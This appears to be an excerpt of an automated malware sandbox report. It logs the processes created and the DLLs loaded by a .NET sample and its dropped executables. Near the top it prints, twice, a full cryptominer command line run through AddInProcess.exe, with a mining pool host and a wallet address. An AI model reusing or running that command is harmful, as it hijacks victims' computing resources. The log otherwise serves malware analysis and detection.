Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o pool.hashvault.pro:80 -u 43i9XqebDi6cXV1AEDLwbJAxy2ormYj4NbvNB5LZDu7TWoe9orevfsZPBb3LtSbPUXbv9bzUAbFZiRNQ2zfigeDZ7aCWf99.RIG_CPU -p x --algo rx/0 --cpu-max-threads-hint=50
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\QgL1KOz6bqKO.bat" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 localhost
Source: unknown	Process created: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Roaming\l6E.exe "C:\Users\user\AppData\Roaming\l6E.exe"
Source: C:\Users\user\AppData\Roaming\l6E.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\l6E.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 9052 -ip 9052
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 9052 -s 1740
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
Source: C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe "C:\Users\user\AppData\Roaming\glmIOFfdMi.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Users\user\AppData\Roaming\YZRVUYjilL.exe "C:\Users\user\AppData\Roaming\YZRVUYjilL.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\QgL1KOz6bqKO.bat" "	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o pool.hashvault.pro:80 -u 43i9XqebDi6cXV1AEDLwbJAxy2ormYj4NbvNB5LZDu7TWoe9orevfsZPBb3LtSbPUXbv9bzUAbFZiRNQ2zfigeDZ7aCWf99.RIG_CPU -p x --algo rx/0 --cpu-max-threads-hint=50
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 localhost
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Roaming\l6E.exe "C:\Users\user\AppData\Roaming\l6E.exe"
Source: C:\Users\user\AppData\Roaming\l6E.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 9052 -ip 9052
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 9052 -s 1740
Source: C:\Windows\SysWOW64\WerFault.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\glmIOFfdMi.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YZRVUYjilL.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YZRVUYjilL.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YZRVUYjilL.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YZRVUYjilL.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YZRVUYjilL.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YZRVUYjilL.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YZRVUYjilL.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YZRVUYjilL.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YZRVUYjilL.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YZRVUYjilL.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YZRVUYjilL.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YZRVUYjilL.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YZRVUYjilL.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YZRVUYjilL.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YZRVUYjilL.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YZRVUYjilL.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YZRVUYjilL.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YZRVUYjilL.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YZRVUYjilL.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YZRVUYjilL.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YZRVUYjilL.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Section loaded: edgegdi.dll
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Section loaded: taskschd.dll
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: edgegdi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe	Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe	Section loaded: edgegdi.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe	Section loaded: powrprof.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe	Section loaded: umpdc.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe	Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe	Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe	Section loaded: napinsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe	Section loaded: pnrpnsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe	Section loaded: wshbth.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe	Section loaded: nlaapi.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe	Section loaded: winrnr.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe	Section loaded: explorerframe.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\SysWOW64\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\PING.EXE	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Section loaded: edgegdi.dll
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\l6E.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\l6E.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\l6E.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\l6E.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\l6E.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\l6E.exe	Section loaded: ucrtbase_clr0400.dll
